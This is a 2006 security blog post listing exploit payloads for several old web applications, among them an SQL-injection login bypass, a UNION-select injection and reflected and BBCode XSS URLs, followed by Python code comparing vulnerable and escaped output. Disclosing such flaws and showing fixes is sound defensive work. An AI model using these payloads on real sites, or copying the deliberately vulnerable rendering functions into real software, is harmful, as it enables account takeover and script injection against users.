ecoestadistica.com

Monday, January 16, 2006

Vulnerabilities...

BlogPHP Authentication Bypass

Link:
http://host/index.php?act=login

username: a' or 1/*
password: anything

The single quote closes the username string, "or 1" makes the WHERE clause always true, and "/*" comments out the rest of the query, including the password check, so the first user row (typically the admin) is returned.

----------------------------------------------------------

microBlog BBCode XSS

BBCode example:

[url=javascript:alert(123)]title[/url]

The [url] target is written into the link's href without checking its scheme, so the javascript: URL runs when a reader clicks the link.

-----------------------------------------------------------

microBlog SQL Injection

SQL injection example:

http://host/microblog/index.php?month=1&year=9999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*

The year parameter is placed unquoted in the query, so the UNION is appended directly; its 14 placeholder columns match the column count of the page's own SELECT (a UNION with a different count is a syntax error), and the trailing /* comments out whatever follows.

------------------------------------------------------------

Netbula Anyboard "tK" XSS Vuln

http://[host]/cgi-bin/anyboard.cgi?pvp=main/&cmd=find&tK=[code]&hIz

Here and in the entries below, [code] marks the parameter whose value is reflected into the page without HTML encoding; a script payload placed there runs in the browser of whoever opens the link.

------------------------------------------------------------

Faq-O-Matic XSS Vuln

http://[victim]/fom.cgi?cmd=recent&file=1&showLastModified=show&_submit=Show+documents&_duration=[code]
http://[victim]/fom.cgi?file=[code]&showLastModified=show
http://[victim]/fom.cgi?_insert=answer&cmd=[code]&file=1

-------------------------------------------------------------

GTP iCommerce XSS Vuln

http://[host]/index.php?page=listStory&cat=Programs+and+Services&subcat=[code]
http://[host]/index.php?page=listStory&cat=[code]

-------------------------------------------------------------

RedKernel Referrer Tracker "rkrt_stats.php" XSS

http://[host]/rkrt_stats.php?refs,,Last_7,0,">[code]

The leading "> closes the attribute the value is written into, so the payload that follows lands in the page as markup rather than as attribute text.

-------------------------------------------------------------

Ultimate Auction XSS Vuln

http://[victim]/cgi-local/auktion/item.pl/item.pl?item=[code]
http://[victim]/cgi-local/auktion/itemlist.pl?category=[code]
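The [url=javascript:...] BBCode case above and the reflected-parameter cases from Anyboard down to Ultimate Auction are both output failures: attacker text reaches the page as a live URL or as markup. What follows is an added example, not code from any of the listed projects: a minimal BBCode [url] renderer that only accepts http and https targets, beside the reflection of a request parameter into an attribute with and without HTML escaping (the "> breakout from the RedKernel entry is the sample payload). The tag grammar, function names, attribute context and template strings are assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# Assumed minimal BBCode grammar: [url=TARGET]TEXT[/url].
URL_TAG = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)
SAFE_SCHEMES = {"http", "https"}


def render_url_vulnerable(bbcode):
    # The tag's target is copied straight into href, so
    # [url=javascript:alert(123)]title[/url] yields a link that runs script on click.
    return URL_TAG.sub(r'<a href="\1">\2</a>', bbcode)


def safe_href(raw):
    """Return the target if its scheme is http(s), otherwise None.

    Whitespace and control characters are dropped first because browsers
    ignore them when reading the scheme, so "java<TAB>script:" would still run."""
    cleaned = "".join(ch for ch in raw if ch.isprintable() and not ch.isspace())
    if urlsplit(cleaned).scheme.lower() not in SAFE_SCHEMES:
        return None
    return cleaned


def render_url_safe(bbcode):
    def repl(match):
        href = safe_href(match.group(1))
        text = html.escape(match.group(2), quote=True)
        if href is None:
            return text  # keep the visible text, drop the link entirely
        return f'<a href="{html.escape(href, quote=True)}">{text}</a>'
    return URL_TAG.sub(repl, bbcode)


def reflect_vulnerable(param):
    # What the listed CGI/PHP pages do with tK, _duration, subcat, item, ...:
    # echo the request parameter into an attribute value unencoded.
    return f'<input name="q" value="{param}">'


def reflect_safe(param):
    # html.escape(quote=True) turns " < > & into entities, so the value can
    # neither close the attribute nor open a tag.
    return f'<input name="q" value="{html.escape(param, quote=True)}">'


if __name__ == "__main__":
    bad_tag = "[url=javascript:alert(123)]title[/url]"
    print(render_url_vulnerable(bad_tag))
    print(render_url_safe(bad_tag))
    print(reflect_vulnerable('"><script>alert(1)</script>'))
    print(reflect_safe('"><script>alert(1)</script>'))
```

Two design points: the scheme check is an allow-list, not a search for the string "javascript", so data:, vbscript: and case or whitespace variants are rejected along with it; and escaping happens at the point where text is written into HTML, with quote=True because the value sits inside a quoted attribute.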

Cheers
